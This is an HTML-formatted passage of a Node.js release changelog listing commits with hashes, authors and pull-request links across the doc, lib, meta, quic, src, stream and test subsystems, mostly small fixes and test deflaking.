<li>[<a href="https://github.com/nodejs/node/commit/52a1c18374"><code>52a1c18374</code></a>] - <strong>doc</strong>: update <code>git node land</code> instructions for security releases (Antoine du Hamel) <a href="https://github.com/nodejs/node/pull/63586" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63586/hovercard">#63586</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/3e6b4da037"><code>3e6b4da037</code></a>] - <strong>doc</strong>: drop --experimental from --permission (Rafael Gonzaga) <a href="https://github.com/nodejs/node/pull/63583" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63583/hovercard">#63583</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/84d05163b9"><code>84d05163b9</code></a>] - <strong>doc</strong>: explicitly ask for reproducible in JS (Rafael Gonzaga) <a href="https://github.com/nodejs/node/pull/63479" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63479/hovercard">#63479</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/7da2a4450e"><code>7da2a4450e</code></a>] - <strong>doc</strong>: fix URL postMessage example in worker_threads (Kit Dallege) <a href="https://github.com/nodejs/node/pull/62203" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62203/hovercard">#62203</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/3d79bd8b29"><code>3d79bd8b29</code></a>] - <strong>doc</strong>: clarify <code>filter</code> option of <code>sqlite.database.applyChangeset</code> (Antoine du Hamel) <a href="https://github.com/nodejs/node/pull/63515" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63515/hovercard">#63515</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/4f4174aace"><code>4f4174aace</code></a>] - <strong>doc</strong>: fix double spaces in ERR_TLS_INVALID_PROTOCOL_METHOD (Daijiro Wachi) <a href="https://github.com/nodejs/node/pull/63511" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63511/hovercard">#63511</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/388323ca4b"><code>388323ca4b</code></a>] - <strong>doc</strong>: fix double space in modules.md (Daijiro Wachi) <a href="https://github.com/nodejs/node/pull/63512" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63512/hovercard">#63512</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/5258ccc058"><code>5258ccc058</code></a>] - <strong>doc</strong>: fix "options" to "option" in tls.createServer (Daijiro Wachi) <a href="https://github.com/nodejs/node/pull/63453" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63453/hovercard">#63453</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/43e83e6507"><code>43e83e6507</code></a>] - <strong>doc</strong>: fix typo in deprecations (Daijiro Wachi) <a href="https://github.com/nodejs/node/pull/63434" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63434/hovercard">#63434</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/f05a61d54c"><code>f05a61d54c</code></a>] - <strong>doc</strong>: remove unsupported template type from v8.md (René) <a href="https://github.com/nodejs/node/pull/63410" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63410/hovercard">#63410</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/c39d5fc820"><code>c39d5fc820</code></a>] - <strong>doc</strong>: fix article usage before vowel-sound acronyms (joao-oliveira-softtor) <a href="https://github.com/nodejs/node/pull/62696" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62696/hovercard">#62696</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/398261f911"><code>398261f911</code></a>] - <strong>doc</strong>: remove the bi-monthly contributor spotlight section (Claudio Wunder) <a href="https://github.com/nodejs/node/pull/62734" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62734/hovercard">#62734</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/fd9e14c405"><code>fd9e14c405</code></a>] - <strong>doc</strong>: update http2's <code>push</code> and <code>trailers</code> events with <code>rawHeaders</code> param (YuSheng Chen) <a href="https://github.com/nodejs/node/pull/63259" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63259/hovercard">#63259</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/b943ce6933"><code>b943ce6933</code></a>] - <strong>doc</strong>: remove inactive members from Triagers list (Antoine du Hamel) <a href="https://github.com/nodejs/node/pull/63329" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63329/hovercard">#63329</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/4b9cdfc022"><code>4b9cdfc022</code></a>] - <strong>doc</strong>: reference correct function in Module docs (Robin Malfait) <a href="https://github.com/nodejs/node/pull/63247" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63247/hovercard">#63247</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/bed84b6df2"><code>bed84b6df2</code></a>] - <strong>doc</strong>: replace Visual Studio 2022 Evergreen version reference with 17.14 (Mike McCready) <a href="https://github.com/nodejs/node/pull/63211" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63211/hovercard">#63211</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/32ea70569b"><code>32ea70569b</code></a>] - <strong>doc</strong>: recommend explicitly Tier 1 or 2 for production applications (Mike McCready) <a href="https://github.com/nodejs/node/pull/63187" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63187/hovercard">#63187</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/4627bcfd82"><code>4627bcfd82</code></a>] - <strong>doc</strong>: run license-builder (github-actions[bot]) <a href="https://github.com/nodejs/node/pull/63232" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63232/hovercard">#63232</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/28eba71845"><code>28eba71845</code></a>] - <strong>doc</strong>: add large pull requests contributing guide (Matteo Collina) <a href="https://github.com/nodejs/node/pull/62829" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62829/hovercard">#62829</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/2648efd438"><code>2648efd438</code></a>] - <strong>doc</strong>: remove unnecessary <code>&lt;!-- eslint-</code> magic comments (Antoine du Hamel) <a href="https://github.com/nodejs/node/pull/63200" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63200/hovercard">#63200</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/a95fc1f8fc"><code>a95fc1f8fc</code></a>] - <strong>doc</strong>: clarify SEA platform support excludes darwin-x64 (MJSHANG) <a href="https://github.com/nodejs/node/pull/63181" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63181/hovercard">#63181</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/aaef29e2e1"><code>aaef29e2e1</code></a>] - <strong>doc</strong>: update release steps when post-release fails (Rafael Gonzaga) <a href="https://github.com/nodejs/node/pull/63131" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63131/hovercard">#63131</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/7d81419cf2"><code>7d81419cf2</code></a>] - <strong>doc</strong>: add Hmac.digest() documentation-only deprecation (DEP0206) (Anshika Jain) <a href="https://github.com/nodejs/node/pull/63121" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63121/hovercard">#63121</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/ececd80d81"><code>ececd80d81</code></a>] - <strong>doc</strong>: document the latest-vX.x schema (Marco Ippolito) <a href="https://github.com/nodejs/node/pull/63033" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63033/hovercard">#63033</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/27c1c1d842"><code>27c1c1d842</code></a>] - <strong>doc</strong>: remove list of versions in <code>BUILDING.md</code> (Antoine du Hamel) <a href="https://github.com/nodejs/node/pull/63113" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63113/hovercard">#63113</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/e369886a65"><code>e369886a65</code></a>] - <strong>doc,sqlite</strong>: document entryPoint argument for loadExtension (Edy Silva) <a href="https://github.com/nodejs/node/pull/63152" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63152/hovercard">#63152</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/e4e5137cbd"><code>e4e5137cbd</code></a>] - <strong>errors</strong>: handle V8 warnings in DisallowJavascriptExecutionScope (Divyanshu Sharma) <a href="https://github.com/nodejs/node/pull/63491" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63491/hovercard">#63491</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/6d1f6048d2"><code>6d1f6048d2</code></a>] - <strong>fs</strong>: make <code>Date</code> properties on <code>Stats</code> enumerable (LiviaMedeiros) <a href="https://github.com/nodejs/node/pull/63328" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63328/hovercard">#63328</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/44c8ebcbd6"><code>44c8ebcbd6</code></a>] - <strong>http</strong>: avoid stream listeners on idle agent sockets (Matteo Collina) <a href="https://github.com/nodejs/node/pull/64004" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64004/hovercard">#64004</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/4c9251fc09"><code>4c9251fc09</code></a>] - <strong>(SEMVER-MINOR)</strong> <strong>http</strong>: add writeInformation to send arbitrary 1xx status codes (Tim Perry) <a href="https://github.com/nodejs/node/pull/63155" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63155/hovercard">#63155</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/39f61fb06c"><code>39f61fb06c</code></a>] - <strong>http2</strong>: emit session close before stream close (Matteo Collina) <a href="https://github.com/nodejs/node/pull/63414" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63414/hovercard">#63414</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/8a8f2127d1"><code>8a8f2127d1</code></a>] - <strong>http2</strong>: validate non-link headers in writeEarlyHints (Matteo Collina) <a href="https://github.com/nodejs/node/pull/62017" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62017/hovercard">#62017</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/8c989ec4a3"><code>8c989ec4a3</code></a>] - <strong>(SEMVER-MINOR)</strong> <strong>inspector</strong>: expose precise coverage start to JS runtime (sangwook) <a href="https://github.com/nodejs/node/pull/63079" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63079/hovercard">#63079</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/c05f38229b"><code>c05f38229b</code></a>] - <strong>lib</strong>: cleanup stateless diffiehellman key handling (Filip Skokan) <a href="https://github.com/nodejs/node/pull/62645" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62645/hovercard">#62645</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/1c16b45d35"><code>1c16b45d35</code></a>] - <strong>lib</strong>: refactor internal webidl converters (Filip Skokan) <a href="https://github.com/nodejs/node/pull/62979" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62979/hovercard">#62979</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/02f35d6dce"><code>02f35d6dce</code></a>] - <strong>lib</strong>: define <code>kEnumerableProperty</code> atomically (Antoine du Hamel) <a href="https://github.com/nodejs/node/pull/63609" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63609/hovercard">#63609</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/12c51547ba"><code>12c51547ba</code></a>] - <strong>lib</strong>: fix typos in esm loader comments (RonGamzu) <a href="https://github.com/nodejs/node/pull/63465" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63465/hovercard">#63465</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/9b03b84262"><code>9b03b84262</code></a>] - <strong>lib</strong>: fix typo idenity =&gt; identity (Daijiro Wachi) <a href="https://github.com/nodejs/node/pull/63112" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63112/hovercard">#63112</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/a84e6b0567"><code>a84e6b0567</code></a>] - <strong>lib</strong>: fixes validator message (Daijiro Wachi) <a href="https://github.com/nodejs/node/pull/62823" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62823/hovercard">#62823</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/11734166a8"><code>11734166a8</code></a>] - <strong>lib</strong>: narrow ReadableStreamBYOBRequest.view return type to Uint8Array (RoomWithOutRoof) <a href="https://github.com/nodejs/node/pull/63017" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63017/hovercard">#63017</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/7cead61d21"><code>7cead61d21</code></a>] - <strong>meta</strong>: flip mcollina emails in .mailmap (Matteo Collina) <a href="https://github.com/nodejs/node/pull/63621" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63621/hovercard">#63621</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/a08cfcfd35"><code>a08cfcfd35</code></a>] - <strong>meta</strong>: label "source maps" PRs (Chengzhong Wu) <a href="https://github.com/nodejs/node/pull/63591" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63591/hovercard">#63591</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/d56e8d2512"><code>d56e8d2512</code></a>] - <strong>meta</strong>: add <code>vfs</code> subsystem label (René) <a href="https://github.com/nodejs/node/pull/62331" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62331/hovercard">#62331</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/6201cfe488"><code>6201cfe488</code></a>] - <strong>meta</strong>: skip scheduled workflows on forks (Jamie Magee) <a href="https://github.com/nodejs/node/pull/63565" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63565/hovercard">#63565</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/f095e2bd31"><code>f095e2bd31</code></a>] - <strong>meta</strong>: add additional gitignore entries (James M Snell) <a href="https://github.com/nodejs/node/pull/63267" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63267/hovercard">#63267</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/1ea52c444c"><code>1ea52c444c</code></a>] - <strong>meta</strong>: move one or more collaborators to emeritus (Node.js GitHub Bot) <a href="https://github.com/nodejs/node/pull/63402" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63402/hovercard">#63402</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/b1b2327611"><code>b1b2327611</code></a>] - <strong>meta</strong>: move one or more collaborators to emeritus (Node.js GitHub Bot) <a href="https://github.com/nodejs/node/pull/63235" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63235/hovercard">#63235</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/7d88e130a9"><code>7d88e130a9</code></a>] - <strong>meta</strong>: ignore AI assistants files (Matteo Collina) <a href="https://github.com/nodejs/node/pull/62612" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62612/hovercard">#62612</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/a53b51df38"><code>a53b51df38</code></a>] - <strong>module</strong>: load ESM helpers eagerly in the snapshot (Joyee Cheung) <a href="https://github.com/nodejs/node/pull/63550" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63550/hovercard">#63550</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/69df688fff"><code>69df688fff</code></a>] - <strong>module</strong>: fix sync hook short-circuit in require() in imported CJS (Joyee Cheung) <a href="https://github.com/nodejs/node/pull/62920" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62920/hovercard">#62920</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/75d9a4ed47"><code>75d9a4ed47</code></a>] - <strong>node-api</strong>: support SharedArrayBuffer in napi_create_typedarray (Yilong Li) <a href="https://github.com/nodejs/node/pull/62710" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62710/hovercard">#62710</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/c20aa4c47b"><code>c20aa4c47b</code></a>] - <strong>quic</strong>: add reusePort option to QuicEndpoint (James M Snell) <a href="https://github.com/nodejs/node/pull/63267" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63267/hovercard">#63267</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/26a30d8a7f"><code>26a30d8a7f</code></a>] - <strong>quic</strong>: implement rate limiting for version nego and immediate close (James M Snell) <a href="https://github.com/nodejs/node/pull/63267" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63267/hovercard">#63267</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/0b534b5770"><code>0b534b5770</code></a>] - <strong>quic</strong>: fixup linting issue after other changes (James M Snell) <a href="https://github.com/nodejs/node/pull/63267" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63267/hovercard">#63267</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/4b367cbe09"><code>4b367cbe09</code></a>] - <strong>quic</strong>: remove unused binding variable in session.cc (James M Snell) <a href="https://github.com/nodejs/node/pull/63177" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63177/hovercard">#63177</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/2574bef5a6"><code>2574bef5a6</code></a>] - <strong>repl</strong>: fix dedup comparing normalized line against raw history (Daijiro Wachi) <a href="https://github.com/nodejs/node/pull/62886" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62886/hovercard">#62886</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/30e71c7e49"><code>30e71c7e49</code></a>] - <strong>sqlite</strong>: keep source database alive during backup (Matteo Collina) <a href="https://github.com/nodejs/node/pull/62673" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62673/hovercard">#62673</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/677ca7e76c"><code>677ca7e76c</code></a>] - <strong>src</strong>: simplify OpenSSL feature gates (Filip Skokan) <a href="https://github.com/nodejs/node/pull/63255" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63255/hovercard">#63255</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/c863c75c39"><code>c863c75c39</code></a>] - <strong>src</strong>: add BoringSSL EVP enumeration fallback (Filip Skokan) <a href="https://github.com/nodejs/node/pull/63206" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63206/hovercard">#63206</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/f6b2466921"><code>f6b2466921</code></a>] - <strong>src</strong>: decouple KeyObject and CryptoKey and move CryptoKey to src (Filip Skokan) <a href="https://github.com/nodejs/node/pull/62924" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62924/hovercard">#62924</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/92d4f07dd2"><code>92d4f07dd2</code></a>] - <strong>src</strong>: remove license headers for new node_profiling files (Chengzhong Wu) <a href="https://github.com/nodejs/node/pull/63066" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63066/hovercard">#63066</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/8ac5d771c8"><code>8ac5d771c8</code></a>] - <strong>src</strong>: split profiling helpers from util (Ilyas Shabi) <a href="https://github.com/nodejs/node/pull/63008" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63008/hovercard">#63008</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/85d1639495"><code>85d1639495</code></a>] - <strong>src</strong>: remove TOCTOU race condition when encoding SAB-backed <code>Buffer</code>s (Antoine du Hamel) <a href="https://github.com/nodejs/node/pull/63517" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63517/hovercard">#63517</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/9473c5f05c"><code>9473c5f05c</code></a>] - <strong>src</strong>: skip duplicate UTF-8 validation in TextDecoder fatal path (Mert Can Altin) <a href="https://github.com/nodejs/node/pull/63231" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63231/hovercard">#63231</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/f35c91ee68"><code>f35c91ee68</code></a>] - <strong>src</strong>: improve token return value check (James M Snell) <a href="https://github.com/nodejs/node/pull/63483" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63483/hovercard">#63483</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/26f677c1c5"><code>26f677c1c5</code></a>] - <strong>src</strong>: expose <code>node::RegisterContext</code> to make a node managed context (Chengzhong Wu) <a href="https://github.com/nodejs/node/pull/62322" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62322/hovercard">#62322</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/275cf909b6"><code>275cf909b6</code></a>] - <strong>src,sqlite</strong>: only pass <code>xFilter</code> when user provided a callback (Antoine du Hamel) <a href="https://github.com/nodejs/node/pull/63516" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63516/hovercard">#63516</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/287e02303f"><code>287e02303f</code></a>] - <strong>src,sqlite</strong>: remove dead code (Edy Silva) <a href="https://github.com/nodejs/node/pull/63204" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63204/hovercard">#63204</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/58fa2ee189"><code>58fa2ee189</code></a>] - <strong>stream</strong>: switch to internal <code>sleep</code> binding (Antoine du Hamel) <a href="https://github.com/nodejs/node/pull/63611" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63611/hovercard">#63611</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/f954ab3f1a"><code>f954ab3f1a</code></a>] - <strong>stream</strong>: use data listener for compose forwarding (Trivikram Kamat) <a href="https://github.com/nodejs/node/pull/63593" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63593/hovercard">#63593</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/dc57173003"><code>dc57173003</code></a>] - <strong>stream</strong>: fix Writable.toWeb() hang on synchronous drain (sangwook) <a href="https://github.com/nodejs/node/pull/61197" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/61197/hovercard">#61197</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/3f54c8ba32"><code>3f54c8ba32</code></a>] - <em><strong>Revert</strong></em> "<strong>stream</strong>: noop pause/resume on destroyed streams" (Stewart X Addison) <a href="https://github.com/nodejs/node/pull/63834" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63834/hovercard">#63834</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/cee279c5d6"><code>cee279c5d6</code></a>] - <strong>stream</strong>: remove unnecessary check (Antoine du Hamel) <a href="https://github.com/nodejs/node/pull/63030" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63030/hovercard">#63030</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/61b20f60a3"><code>61b20f60a3</code></a>] - <strong>test</strong>: update tls/crypto behaviour expectations when using BoringSSL (Filip Skokan) <a href="https://github.com/nodejs/node/pull/63161" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63161/hovercard">#63161</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/a835363808"><code>a835363808</code></a>] - <strong>test</strong>: update WPT for WebCryptoAPI to 97bbc7247a (Node.js GitHub Bot) <a href="https://github.com/nodejs/node/pull/63417" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63417/hovercard">#63417</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/a00297480b"><code>a00297480b</code></a>] - <strong>test</strong>: update WPT resources, interfaces and WebCryptoAPI (Node.js GitHub Bot) <a href="https://github.com/nodejs/node/pull/62389" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62389/hovercard">#62389</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/5a95a2b055"><code>5a95a2b055</code></a>] - <strong>test</strong>: shorten path in net pipe connect errors (Matteo Collina) <a href="https://github.com/nodejs/node/pull/63405" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63405/hovercard">#63405</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/5e8ff22d8f"><code>5e8ff22d8f</code></a>] - <strong>test</strong>: remove test-node-output-v8-warning (Joyee Cheung) <a href="https://github.com/nodejs/node/pull/63469" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63469/hovercard">#63469</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/ee15380950"><code>ee15380950</code></a>] - <strong>test</strong>: update test426-fixtures to 9b9e225b5a63139e9a95cdd1bf874a8f0b9d131 (Node.js GitHub Bot) <a href="https://github.com/nodejs/node/pull/63373" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63373/hovercard">#63373</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/9e063d9bea"><code>9e063d9bea</code></a>] - <strong>test</strong>: update WPT for url to e4a4672e9e (Node.js GitHub Bot) <a href="https://github.com/nodejs/node/pull/63372" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63372/hovercard">#63372</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/503bee4b43"><code>503bee4b43</code></a>] - <strong>test</strong>: deflake async-hooks statwatcher test (Trivikram Kamat) <a href="https://github.com/nodejs/node/pull/63396" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63396/hovercard">#63396</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/cccc7c32d8"><code>cccc7c32d8</code></a>] - <strong>test</strong>: avoid test_runner watch restart in spec snapshot (Trivikram Kamat) <a href="https://github.com/nodejs/node/pull/63392" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63392/hovercard">#63392</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/c89489258c"><code>c89489258c</code></a>] - <strong>test</strong>: reduce watch mode restart flakiness (Trivikram Kamat) <a href="https://github.com/nodejs/node/pull/63390" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63390/hovercard">#63390</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/e4d5e2578e"><code>e4d5e2578e</code></a>] - <strong>test</strong>: isolate rerun-failures state file under tmpdir (Chemi Atlow) <a href="https://github.com/nodejs/node/pull/63449" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63449/hovercard">#63449</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/362644a9ba"><code>362644a9ba</code></a>] - <strong>test</strong>: wait for ok before initial break after restart (Yuya Inoue) <a href="https://github.com/nodejs/node/pull/62807" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62807/hovercard">#62807</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/c4058d0e05"><code>c4058d0e05</code></a>] - <strong>test</strong>: disable Maglev in near-heap-limit worker test (Trivikram Kamat) <a href="https://github.com/nodejs/node/pull/63398" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63398/hovercard">#63398</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/214da630a7"><code>214da630a7</code></a>] - <strong>test</strong>: deflake connection refused proxy tests (Trivikram Kamat) <a href="https://github.com/nodejs/node/pull/63395" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63395/hovercard">#63395</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/1d61a29876"><code>1d61a29876</code></a>] - <strong>test</strong>: avoid repeated writes in watch helper (Trivikram Kamat) <a href="https://github.com/nodejs/node/pull/63386" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63386/hovercard">#63386</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/2004e25387"><code>2004e25387</code></a>] - <strong>test</strong>: deflake watch mode worker test (Trivikram Kamat) <a href="https://github.com/nodejs/node/pull/63384" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63384/hovercard">#63384</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/d691cccfc1"><code>d691cccfc1</code></a>] - <strong>test</strong>: relax test-memory-usage arrayBuffers check (inoway46) <a href="https://github.com/nodejs/node/pull/63244" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63244/hovercard">#63244</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/0ff6bf853c"><code>0ff6bf853c</code></a>] - <strong>test</strong>: reduce flakiness of <code>different-registry-per-thread</code> (Antoine du Hamel) <a href="https://github.com/nodejs/node/pull/63244" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63244/hovercard">#63244</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/d9f4e8e503"><code>d9f4e8e503</code></a>] - <strong>test</strong>: fix flaky test-watch-mode-inspect timeout (Matteo Collina) <a href="https://github.com/nodejs/node/pull/63361" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63361/hovercard">#63361</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/6d7cd50328"><code>6d7cd50328</code></a>] - <strong>test</strong>: relax min assertion in test-performance-eventloopdelay (Marco) <a href="https://github.com/nodejs/node/pull/63100" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63100/hovercard">#63100</a></li>
